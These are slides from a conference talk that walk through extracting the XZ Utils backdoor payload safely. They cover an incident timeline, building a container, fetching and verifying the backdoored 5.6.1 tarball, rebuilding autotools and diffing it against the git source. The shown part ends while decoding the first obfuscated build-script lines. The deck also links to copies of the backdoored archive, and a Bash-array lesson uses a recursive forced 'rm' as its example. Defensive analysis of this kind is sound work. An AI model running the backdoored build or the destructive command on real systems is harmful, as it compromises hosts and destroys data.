# How to extract the XZ backdoor malware payload
Step-by-step process to complete the first step of analysing the XZ backdoor.
Buo-ren Lin 0w0/
UbuCon Asia 2024 Talk
<small><https://hackmd.io/@brlin/xz-backdoor-payload-extraction-howto-en></small>
---
## <code>$ whoami</code>
* A member of the following communities:
+ [Ubuntu-TW](https://t.me/x_ubuntu_taiwan_community)
+ [L10N.TW](https://l10n.tw)
+ [MozTW](https://moztw.org)
+ [Snapcrafters](https://snapcrafters.org)
* A GNU/Linux user that somewhat familiar to Bash, C, and Snap packaging.
* A ex-operations engineer with some information-security incident experience, here's my [résumé](https://brlin.me/resume).
---
## Recommended talk
![Screenshot](https://hackmd.io/_uploads/BkLzUiWnA.png)
---
## WTF is the XZ backdoor?
* A supply chain attack incident that threatens the security of the Linux servers in the entire world.
* A mixture of Social Engineering attack, maliciously crafted software testing data, and code obfuscation.
* Right before the attacker gain broad host access it is unintentionally discovered by a third-party, who have alerted the public and the attack is swiftly mitigated by the FOSS community.
---
## Event timeline
* 2021.10: "Jia Tan" start contributing benign patches to the XZ Utils project
* 2022.04~2022.06: "Jihar Kumar" and "Dennis Ens" sent several mails to the mailing list pressuring the project maintainer to pass on the maintainership to "Jia Tan".
* 2022.10: "Jia Tan" is given maintainer access to the XZ Utils project.
---
## Event timeline(cont.)
* 2023.06: "Hans Jansen" contributed a optimization patch that can be used by the backdoor code to override function calls.
* 2024.02: "Jia Tan" injects malicious binary code in the disguise of software test files to the XZ Utils source code repository.
---
## Event timeline(cont.)
* 2024.02: "Jia Tan" releases XZ Utils 5.6.0 and publishes a source release archive that contains an malicious build system file that extracts the malicious code in the test data and injects it into the build.
* 2024.03: "Jia Tan" releases XZ Utils 5.6.1 with bugfixes to the backdoor that has caused downstream valgrind check to error.
* 2024.03: ["Hans Jansen" files a bug to Debian to pressure the downstream maintainer to import the 5.6.1 version of XZ Utils](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708)
---
## Event timeline(cont.)
* 2024.03.28: ["Jia Tan" attempts to pressure the downstream Ubuntu maintainer to import the backdoored XZ Utils package to Ubuntu](https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417)
* 2024.03.28: [Andres Freund discovers the backdoor and alerts the related parties.](https://www.openwall.com/lists/oss-security/2024/03/29/4)
* 2024.03.28: [Debian rolles XZ Utils packageback to 5.4.5](https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/)
* 2024.03.28: [Arch Linux changes build recipe to avoid using the source release archive from the upstream.](https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/881385757abdc39d3cfea1c3e34ec09f637424ad)
---
## Expectations
This talk will inform you:
* How to investigate a potential malware on a Linux system in a safe manner.
* Generic FOSS software building process.
This talk will NOT inform you:
* How to reverse-engineer the malware payload.
---
## Prerequisites
* You need to have a basic experience of operating the Linux text terminal.
* The host for the operation needs to have the Docker container runtime installed.
<!-- + Docker provides an isolated environment to avoid the situation where the malware may be accidentally executed. -->
+ {Other virtualization solutions|containers, virtual machines} may also work with slightly different operation details.
* The host for the operation needs to have Internet access.
---
## Bash indexed array syntax introduction
For convenience to explain how the command options and arguments work:
```bash
rm_opts=(
# Recursively remove sub-directory items.
--recursive
# Don't prompt on concerning items and conduct the operation without questioning whether it is sane to do so
--force
)
rm "${rm_opts[@]}" /not/your/root/*
```
```
$ echo rm "${rm_opts[@]}" /not/your/root/*
rm --recursive --force /not/your/root/*
```
---
## Creating a working directory
Prevent accidentally using the malware
**DO NOT** place it in your Downloads folder
```bash!
mkdir '/path/to/the/hosting/dir/CVE-2024-3094'
```
---
## Prepare the guest environment(container/VM) for security investigation
You don't really want to conduct a malware analysis using {the host environment|My Computer}, right?
---
### Fetch the Ubuntu 22.04 Docker image from the container registry
Download the latest Docker image in order to reduce the time required for applying security updates:
```bash
docker pull ubuntu:22.04
```
---
### Create the Docker container of the operation environment and acquire its interactive shell
```bash
docker_run_opts=(
--rm
--interactive --tty
--mount "type=bind,source=${PWD},destination=/project"
--env TZ=CST-8
--name cve-2024-3094
--hostname cve-2024-3094
)
docker run "${docker_run_opts[@]}" ubuntu:22.04
```
---
### Switch to the local Ubuntu archive mirror
To reduce the time required to download packages:
```bash
mirror=in.archive.ubuntu.com
sed_opts=(
--in-place=".orig"
--regexp-extended
--expression="s@//[^/]*/ubuntu/@//${mirror}/ubuntu/@"
)
sed "${sed_opts[@]}" /etc/apt/sources.list
apt update
```
---
### Upgrade the operating environment's software to the latest version
```bash
apt full-upgrade
```
Reduce the chance of the malware gaining privilege in-and-out container via the software/container's security defects.
---
## Compare the difference between the contaminated XZ Utils 5.6.1 software and the original
What changes are applied by the attacker in order to conduct this attack?
---
### Acquire the contaminated XZ Utils 5.6.1 software source release package and its PGP signature
The original download link from the GitHub project no longer works, however you can retrieve a copy from [the page snapshots of the Wayback Machine](https://web.archive.org/web/*/https://github.com/tukaani-project/xz/releases/download/*):
* <https://web.archive.org/web/20240329215428%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2>
* <https://web.archive.org/web/20240329215430%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2.sig>
---
### Verify the contaminated XZ Utils source release package's authenticity
Although it is ironic that we need to do so lmao.
---
### Install the GnuPG utility that is used to authenticate the authenticity of the source release package
GnuPG is [Pretty Good Privacy(PGP)](https://en.wikipedia.org/wiki/Pretty_Good_Privacy)'s main open-source implementation.
```bash
apt install gnupg
```
---
### Acquire the PGP public key of the attacker
The original domain name of the XZ Utils official website is now invalid, but you can still recover the public key from the Wayback Machine page snapshot:
<https://web.archive.org/web/20240119212247/https://xz.tukaani.org/keys/jia_tan_pubkey.txt>
Simply save the file to your working directory and rename the file to "potential-evil-actor.pubkey".
---
### Import the attacker's PGP public key to your GnuPG keyring
```bash
gpg --import potential-evil-actor.pubkey
```
```txt!
gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 59FCF207FEA7F445: public key "Jia Tan <jiat0218@gmail.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: no ultimately trusted keys found
```
---
### Verify the authenticity of the contaminated source package
```bash
gpg_opts=(
# Use the xz-5.6.1.tar.bz2.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the xz-5.6.1.tar.bz2 file
--verify xz-5.6.1.tar.bz2.sig xz-5.6.1.tar.bz2
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Sat Mar 9 08:22:45 2024 UTC
gpg: using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445
gpg: Good signature from "Jia Tan <jiat0218@gmail.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 22D4 65F2 B4C1 7380 3B20 C6DE 59FC F207 FEA7 F445
```
---
### Extract the contaminated 5.6.1 version of the XZ Utils source package
```bash
bzip_tarball_extraction_dependency_pkgs=(
# For extracting files compressed using the bzip2
# compression format
bzip2
# For extracting uncompressed tarballs
tar
)
apt install "${bzip_tarball_extraction_dependency_pkgs[@]}"
```
---
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file xz-5.6.1.tar.bz2
)
tar "${tar_opts[@]}"
```
![image](https://hackmd.io/_uploads/HkCn5XcF0.png)
---
### Checkout the uncontaminated 5.6.1 version of XZ Utils's software source code
XZ Utils [uses Git to version control their source code](https://git.tukaani.org/?p=xz.git), install Git's client first:
```bash
apt install git
```
---
```bash
git_clone_opts=(
# Only fetch single depth of the history to reduced clone time
--depth=1
# Only check out the revision that represents the 5.6.1 release
--branch v5.6.1
)
git clone "${git_clone_opts[@]}" \
https://git.tukaani.org/xz.git \
xz-git
```
![image](https://hackmd.io/_uploads/r1rgiQqF0.png)
---
### Compare the differences between the two version of XZ Utils
First install an utility that will be used to compare difference between two directory trees:
```bash
apt install tree
```
---
```bash
diff_opts=(
--unified=0 # Use the unified diff format, without
) # showing the context lines
grep_opts=(
--extended-regexp # Use the Extended Regular Expression
# (ERE) syntax that is easier to write
--regexp='^(---|\+\+\+) ' # The regular expression
# pattern to match
--invert-match # Match lines that didn't match the regex
)
tree_opts=(
-a # Enumerate hidden files as well
-I '.git/' # Do no enumerate files in the Git database
)
# Bash Manual > Basic Shell Features > Shell Expansions
# > Process Substitution
diff "${diff_opts[@]}" \
<(tree "${tree_opts[@]}" xz-git) \
<(tree "${tree_opts[@]}" xz-5.6.1) \
| grep "${grep_opts[@]}" \
| less
```
---
```diff=
@@ -1 +1,3 @@
-xz-git
+xz-5.6.1
+├── ABOUT-NLS
+├── aclocal.m4
...stripped...
@@ -19 +29,2 @@
-├── .codespellrc
+├── config.h.in
+├── configure
...stripped...
@@ -550 +758 @@
-38 directories, 510 files
+48 directories, 708 files
```
---
## The differences between the source code from the release package and the one checked out from the repo
The released source package may have the following pre-built assets from the project maintainer:
* Ready to be used software build configuration program<!-- (because the user environment may no have the version of the software required for building)-->
* Software usage/development document
---
## The differences between the source code from the release package and the one checked out from the repo(cont.)
Comparing to the source code checked out from the repository, the released source package may also lack:
* Configuration files that only be used in software development
---
### Review the installation documentation of the XZ Utils software
We need to determine:
* The software build system the software uses.
* The software's build dependencies
* Available source build configuration options and their default values.
* Other special things to note of.
---
Install a plaintext data pager that supports PageUp/PageDown browsing operations:
```bash
apt install less
```
:::danger
**Warning:** [DO NOT use the `cat` utility to read documents](https://twitter.com/0xAsm0d3us/status/1774534241084445020)
:::
---
![image](https://hackmd.io/_uploads/HkpLuxntR.png)
---
![image](https://hackmd.io/_uploads/rJlPYx3F0.png)
---
### Review the installation documentation of the XZ Utils software
```bash
less xz-git/INSTALL
```
Common operations
* `↑`/`↓`:Move up/down a line
* `PageUp`/`PageDn`:Move to the last/next page
* `h`:Read the usage README
* `q`:Leave the pager program.
---
![image](https://hackmd.io/_uploads/rkR-rzqKA.png)
xz-git/INSTALL > Preface
---
![image](https://hackmd.io/_uploads/Sy6ESM9tA.png)
xz-git/INSTALL.generic > Basic Installation
---
![image](https://hackmd.io/_uploads/r1LuBf9YA.png)
xz-git/INSTALL.generic > Basic Installation
---
![image](https://hackmd.io/_uploads/ry7oUGctC.png)
xz-git/INSTALL.generic > Basic Installation
---
The XZ Utils software uses the [GNU build system](https://www.gnu.org/software/automake/manual/html_node/GNU-Build-System.html) to build itself, it comprises of the following software components, including but not limited to:
* [GNU Autoconf](https://www.gnu.org/software/autoconf/)
* [GNU Automake](https://www.gnu.org/software/automake/)
* [GNU Libtool](https://www.gnu.org/software/libtool/)
---
### Verify the software build system component versions that were used to build the 5.6.1 version of the XZ Utils source release package
---
Verify the GNU Autoconf version that is used by the attacker:
```bash/
head_opts=(
# Only show the first three lines of the file
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/configure
```
```bash
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.
```
GNU Autoconf==2.72
---
```bash
head_opts=(
# Only show the first three lines of the file
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/Makefile.in
```
```output
# Makefile.in generated by automake 1.16.5 from Makefile.am.
# @configure_input@
```
GNU Automake==1.16.5
---
```bash
head_opts=(
# Only show the first five lines of the file
--lines=5
)
head "${head_opts[@]}" xz-5.6.1/build-aux/ltmain.sh
```
```output
#! /usr/bin/env sh
## DO NOT EDIT - This file generated from ./build-aux/ltmain.in
## by inline-source v2019-02-19.15
# libtool (GNU libtool) 2.4.7.4-1ec8f-dirty
```
GNU libtool~=2.4.7.4-1ec8f-dirty?
---
![image](https://hackmd.io/_uploads/BknMnMcF0.png)
GNU libtool==1ec8f revision + {unknown changes|-dirty}
---
XZ Utils also appeared to be using GNU Gettext:
```m4
dnl Support for _REQUIRE_VERSION was added in gettext 0.19.6. If both
dnl _REQUIRE_VERSION and _VERSION are present, the _VERSION is ignored.
dnl We use both for compatibility with other programs in the Autotools family.
echo
echo "Initializing gettext:"
AM_GNU_GETTEXT_REQUIRE_VERSION([0.19.6])
AM_GNU_GETTEXT_VERSION([0.19.6])
AM_GNU_GETTEXT([external])
```
xz-git/configure.ac
---
```bash
head_opts=(
# Only show the first line of the file
--lines=1
)
head "${head_opts[@]}" xz-5.6.1/m4/gettext.m4
```
```txt
# gettext.m4 serial 78 (gettext-0.22.4)
```
GNU Gettext==0.22.4
---
### Install the dependencies of building XZ Utils's {build configuration program|./configure}: GNU Autoconf 2.72
![download](https://hackmd.io/_uploads/SyKVyuiKR.png)
![list](https://hackmd.io/_uploads/S1Z1edsFA.png)
---
```bash
gpg_opts=(
# Use the autoconf-2.72.tar.xz.sig detached PGP
# signature and the signer's PGP public key to verify
# the authenticity of the autoconf-2.72.tar.xz file
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt
gpg: Signature made Fri Dec 22 19:13:21 2023 UTC
gpg: using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Can't check signature: No public key
```
---
```bash
gpg_opts=(
# Specify the PGP keyserver to request the signer's
# public key(the default `hkps://keys.openpgp.org`
# keyserver seems to be flaky)
--keyserver keyserver.ubuntu.com
# Retrieve and import the PGP public key of the
# specified KeyID into the GnuPG keyring
--receive-keys 82F854F3CE73174B8B63174091FCC32B6769AA64
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: key 91FCC32B6769AA64: public key "Zack Weinberg <zackw@panix.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
---
```bash
gpg_opts=(
# Use the autoconf-2.72.tar.xz.sig detached PGP
# signature and the signer's PGP public key to verify
# the authenticity of the autoconf-2.72.tar.xz file
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Sat Dec 23 03:13:21 2023 CST
gpg: using RSA key 82F854F3CE73174B8B63174091FCC32B6d
gpg: Good signature from "Zack Weinberg <zackw@panix.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 82F8 54F3 CE73 174B 8B63 1740 91FC C32B 6769 AA64
```
---
Install the dependency software to extract XZ-compressed tarballs
```bash
apt install xz-utils
```
Extract the source archive
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file autoconf-2.72.tar.xz
)
tar "${tar_opts[@]}"
```
---
Switch the working directory to the root directory of the GNU Autoconf source tree:
```bash!
cd autoconf-2.72
```
Review the help message output of the build configuration program:
```bash!
./configure --help
```
Iteratively, run the software build configuration program:
```bash
./configure
```
---
```txt!
configure: error: no acceptable m4 could be found in $PATH.
GNU M4 1.4.8 or later is required; 1.4.16 or newer is recommended.
GNU M4 1.4.15 uses a buggy replacement strstr on some systems.
Glibc 2.9 - 2.12 and GNU M4 1.4.11 - 1.4.15 have another strstr bug.
```
Solution:
```bash
apt install m4
```
---
```txt
configure: creating ./config.status
config.status: creating tests/atlocal
config.status: creating Makefile
config.status: creating lib/version.m4
config.status: executing tests/atconfig commands
You are about to use an experimental version of Autoconf. Be sure to
read the relevant mailing lists, most importantly <autoconf@gnu.org>.
Below you will find information on the status of this version of Autoconf.
...stripped...
```
```bash
/project/autoconf-2.72# echo "${?}"
0
```
```bash
/project/autoconf-2.72# head --lines=2 Makefile
# Makefile.in generated by automake 1.16.5 from Makefile.am.
# Makefile. Generated from Makefile.in by configure.
```
---
Install GNU Make:
```bash
apt install make
```
Start building the software:
```bash
# Query the supported thread count of the system's CPU
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
---
```txt
make[1]: Entering directory '/project/autoconf-2.72'
...stripped...
mv -f tests/autoheader.tmp tests/autoheader
mv -f tests/autoconf.tmp tests/autoconf
mv -f tests/autom4te.tmp tests/autom4te
mv -f tests/autoscan.tmp tests/autoscan
mv -f tests/autoreconf.tmp tests/autoreconf
mv -f tests/autoupdate.tmp tests/autoupdate
mv -f tests/ifnames.tmp tests/ifnames
make[1]: Leaving directory '/project/autoconf-2.72'
```
```bash
/project/autoconf-2.72# echo "${?}"
0
```
---
Install the built software:
```bash!
/project/autoconf-2.72# make install
```
```txt!
make install-am
make[1]: Entering directory '/project/autoconf-2.72'
...stripped...
make[3]: Leaving directory '/project/autoconf-2.72'
make[2]: Leaving directory '/project/autoconf-2.72'
make[1]: Leaving directory '/project/autoconf-2.72'
```
```bash
/project/autoconf-2.72# echo "${?}"
0
```
---
Verify whether the software is successfully installed:
```txt
/project/autoconf-2.72# autoconf --version
autoconf --version
autoconf (GNU Autoconf) 2.72
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+/Autoconf: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html>, <https://gnu.org/licenses/exceptions.html>
...stripped...
```
Switch the working directory back:
```bash
cd /project
```
---
### Install the dependencies of building XZ Utils's {build configuration program|./configure}: GNU Automake 1.16.5
![downloads](https://hackmd.io/_uploads/HJh2_S3F0.png)
![files](https://hackmd.io/_uploads/HymL_S2KR.png)
---
Query the signer's PGP public key KeyID:
```bash
gpg_opts=(
# Use the automake-1.16.5.tar.xz.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the automake-1.16.5.tar.xz file
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Mon Oct 4 11:23:30 2021 CST
gpg: using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Can't check signature: No public key
```
---
Import the signer's PGP public key to your GnuPG keyring:
```bash
gpg_opts=(
# Specify the PGP keyserver to request the signer's
# public key(the default `hkps://keys.openpgp.org`
# keyserver seems to be flaky)
--keyserver keyserver.ubuntu.com
# Retrieve and import the PGP public key of the
# specified KeyID into the GnuPG keyring
--receive-keys 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: key 7FD9FCCB000BEEEE: public key "Jim Meyering <jim@meyering.net>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
---
Verify the authenticity of the GNU Automake source package:
```bash
gpg_opts=(
# Use the automake-1.16.5.tar.xz.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the automake-1.16.5.tar.xz file
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt
gpg: Signature made Mon Oct 4 03:23:30 2021 UTC
gpg: using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Good signature from "Jim Meyering <jim@meyering.net>" [unknown]
gpg: aka "Jim Meyering <meyering@fb.com>" [unknown]
gpg: aka "Jim Meyering <meyering@gnu.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 155D 3FC5 00C8 3448 6D1E EA67 7FD9 FCCB 000B EEEE
```
---
Extract the source archive:
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file automake-1.16.5.tar.xz
)
tar "${tar_opts[@]}"
```
Switch the working directory to the root directory of the GNU Automake source tree:
```bash!
cd automake-1.16.5
```
---
Configure software build:
```bash
./configure
```
```txt
/project/automake-1.16.5# echo "${?}"
0
```
Build the software:
```bash
# Query the supported thread count of the system's CPU
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
```txt
/project/automake-1.16.5# echo "${?}"
0
```
---
Install built software:
```bash!
/project/automake-1.16.5# make install
```
Verify installation:
```bash!
/project/automake-1.16.5# automake --version
```
```txt!
automake (GNU automake) 1.16.5
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv2+: GNU GPL version 2 or later <https://gnu.org/licenses/gpl-2.0.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by Tom Tromey <tromey@redhat.com>
and Alexandre Duret-Lutz <adl@gnu.org>.
```
Switch the working directory back:
```bash
cd /project
```
---
### Install the 18c8f revision of the GNU libtool software, which is a dependency for building the XZ Utils {software build configuration program|./configure}
![image](https://hackmd.io/_uploads/BJbyJI3tA.png)
---
```bash
git_clone_opts=(
# Only fetch the recent 200 commits to reduce the time
# required for cloning the repository
--depth=200
)
git clone "${git_clone_opts[@]}" \
https://git.savannah.gnu.org/git/libtool.git \
libtool-git
cd libtool-git
git checkout 1ec8fa2
```
```txt!
Cloning into 'libtool-git'...
...stripped...
Note: switching to '1ec8fa2'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
```
---
Build the software build configuration program:
```bash
test -f configure || ./bootstrap
```
```txt!
bootstrap: error: Prerequisite 'help2man' not found. Please install it, or
bootstrap: 'export HELP2MAN=/path/to/help2man'.
bootstrap: error: Prerequisite 'makeinfo' not found. Please install it, or
bootstrap: 'export MAKEINFO=/path/to/makeinfo'.
```
```bash
apt install help2man texinfo
```
```bash
test -f configure || ./bootstrap
```
```out!
bootstrap: Done. Now you can run './configure'.
```
---
Configure software build:
```bash
./configure
```
```txt!
configure: error: no acceptable C compiler found in $PATH
```
```bash
apt install gcc
```
```bash
./configure
```
```txt!
...stripped...
config.status: executing tests/atconfig commands
config.status: executing depfiles commands
config.status: executing libtool commands
```
```bash
/project/libtool-git# echo "${?}"
0
```
---
Build the software:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
```txt!
GEN libtoolize
make all-recursive
make[1]: Entering directory '/project/libtool-git'
...stripped...
make[1]: Leaving directory '/project/libtool-git'
```
```bash
/project/libtool-git# echo "${?}"
0
```
---
Install built software:
```bash
make install
```
```txt!
make[1]: Entering directory '/project/libtool-git'
Making install in .
...stripped...
make[1]: Leaving directory '/project/libtool-git'
```
```bash
/project/libtool-git# echo "${?}"
0
```
---
Verify installation:
```bash
libtoo --version
```
```txt!
libtool (GNU libtool) 2.4.7.4-1ec8
Written by Gordon Matzigkeit, 1996
Copyright (C) 2014 Free Software Foundation, Inc.
```
Switch the working directory back to the project directory:
```bash
cd /project
```
---
### Install the 0.22.4 version of the GNU Gettext software, which is a dependency for building the XZ Utils {software build configuration program|./configure}:
![image](https://hackmd.io/_uploads/Sy4fLUhKR.png)
---
Download the source release package and its corresponding PGP signature file:
![image](https://hackmd.io/_uploads/HyXOIUnFC.png)
<https://ftp.gnu.org/pub/gnu/gettext/>
---
Verify the signer's PGP public key KeyID:
```bash
gpg_opts=(
# Use the gettext-0.22.4.tar.lz.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the gettext-0.22.4.tar.lz file
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
```out!
gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg: using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Can't check signature: No public key
```
---
Import the signer's PGP public key to your GnuPG keyring:
```bash
gpg_opts=(
# Specify the PGP keyserver to request the signer's
# public key(the default `hkps://keys.openpgp.org`
# keyserver seems to be flaky)
--keyserver keyserver.ubuntu.com
# Retrieve and import the PGP public key of the
# specified KeyID into the GnuPG keyring
--receive-keys 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: key F5BE8B267C6A406D: public key "Bruno Haible (Open Source Development) <bruno@clisp.org>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
---
Verify the authenticity of the Gettext release package:
```bash
gpg_opts=(
# Use the gettext-0.22.4.tar.lz.sig detached PGP
# signature and the signer's PGP public key to verify
# the authenticity of the gettext-0.22.4.tar.lz file
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```txt!
gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg: using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Good signature from "Bruno Haible (Open Source Development) <bruno@clisp.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 9001 B85A F9E1 B83D F1BD A942 F5BE 8B26 7C6A 406D
```
---
Extract the release source archive:
```bash
apt install lzip
```
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file gettext-0.22.4.tar.lz
)
tar "${tar_opts[@]}"
```
Switch the working directory to the root directory of the GNU Gettext source tree:
```bash
cd gettext-0.22.4
```
---
Configure the software build:
```bash
./configure
```
```txt!
...stripped...
configure: creating ./config.status
config.status: creating Makefile
config.status: creating installpaths
config.status: creating po/Makefile
config.status: executing po-directories commands
```
```bash
/project/gettext-0.22.4# echo "${?}"
0
```
---
Build the software:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
```txt!
...stripped...
make[1]: Leaving directory '/project/gettext-0.22.4'
```
```bash
/project/gettext-0.22.4# echo "${?}"
0
```
---
Install the software:
```bash
make install
```
```txt!
make install-recursive
make[1]: Entering directory '/project/gettext-0.22.4'
...stripped...
make[1]: Leaving directory '/project/gettext-0.22.4'
```
```bash
/project/gettext-0.22.4# echo "${?}"
0
```
---
Verify the software installation:
```bash
gettext --version
```
```txt!
gettext (GNU gettext-runtime) 0.22.4
Copyright (C) 1995-2023 Free Software Foundation, Inc.
...skipped...
```
Return to the working directory:
```bash
cd /project
```
---
### Build XZ Utils's {software build configuration program|./configure}
Switch the working directory to root of the XZ Utils source tree:
```bash!
cd xz-git
```
Build the {software build configuration program|./configure}:
```bash!
./autogen.sh
```
```txt!
...stripped...
+ sh update-po
po4a/update-po: The program 'po4a' was not found.
po4a/update-po: Translated man pages were not generated.
```
```bash!
/project/xz-git# echo $?
1
```
---
Query which Ubuntu package provides the `po4a` command:
```bash!
apt install apt-file
apt-file update
apt_file_search_opts=(
# Specify that the search pattern is a regular
# expression instead of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/po4a$'
```
```txt!
po4a: /usr/bin/po4a
```
```bash
apt install po4a
```
---
```bash!
./autogen.sh
```
```txt!
...stripped...
+ sh update-doxygen
doxygen/update-doxygen: 'doxygen' command not found.
doxygen/update-doxygen: Skipping Doxygen docs generation.
```
```bash!
/project/xz-git# echo $?
1
```
---
Check which Ubuntu package provides the `doxygen` command:
```bash!
apt_file_search_opts=(
# Specify that the search pattern is a regular expression instead
# of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/doxygen$'
```
```txt!
doxygen: /usr/bin/doxygen
```
```bash
apt install doxygen
```
---
```bash!
./autogen.sh
```
```txt!
...stripped...
Stripping JavaScript from Doxygen output...
+ cd ..
+ exit 0
```
```bash!
/project/xz-git# echo "${?}"
0
```
---
### Generate the content difference between the source code in repository and the contaminated source release archive
```bash
diff_opts=(
# Exclude files that we have no interest #
# Softawre documentation
--exclude='ChangeLog' --exclude='doc'
# Internationalization(I18N) and Localization(L10N) files
--exclude='*.po' --exclude='*.pot'
--exclude='*.gmo' --exclude='po4a'
# The Git repository
--exclude='.git'
# Use the unified difference format to compare
# two tree's content differences
--unified --recursive
)
diff "${diff_opts[@]}" xz-git xz-5.6.1 \
>xz-vanilla-vs-tainted.diff
```
---
![image](https://hackmd.io/_uploads/rJ2d0UhKC.png)
---
### The part where you should start to be suspicious:
![image](https://hackmd.io/_uploads/HyciEv2KC.png)
Line 18686 set the `gl_am_configmake` variable's value to a weird command's output.
---
```bash
grep_opts=(
# Also match non-plaintext files
--text
# Use the Extended Regular Expression(ERE) syntax
--extended-regexp
# Recursively search all the sub-directories
--recursive
# Only print the filename that matches the regexp,
# instead of the matched lines
--files-with-matches
# Don't print out error message regarding read errors
--no-messages
)
# Search filenames which file contains "four consecutive
# pound symbols, followed by five consecutive alphanumeric
# characters, followed by four consecutive pound symbols"
# in the source directory
grep "${grep_opts[@]}" '#{4}[[:alnum:]]{5}#{4}$' xz-5.6.1
```
---
Running that command in a text terminal reveals the following output:
```txt!
xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
the whole command is an equivalent of:
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
---
Line 18695 assigns the value of the `gl_path_map` variable to a strange `tr` command:
![image](https://hackmd.io/_uploads/rJUeHDhF0.png)
---
`tr "\t \-_" " \t_\-"` ... what does this command do?
* Replaces tab characters to spaces
* Replaces space characters to tabs
* Replaces hyphen-dash(-) characters to underscores(\_)
* Replaces underscores(\_) to hyphen-dashes(-)
Smells like obfuscation :-/
---
Line 19878 assigns the value of the `gl_localedir_prefix` variable to a strange command's output:
![image](https://hackmd.io/_uploads/S1EyUwnY0.png)
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
---
Replace the "0 or more characters following an period symbol" to a null string:
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
echo $gl_am_configmake | sed "s/.*\.//g"
```
```txt!
xz
```
This variable is used to hide the usage of the `xz` command in the later commands.
---
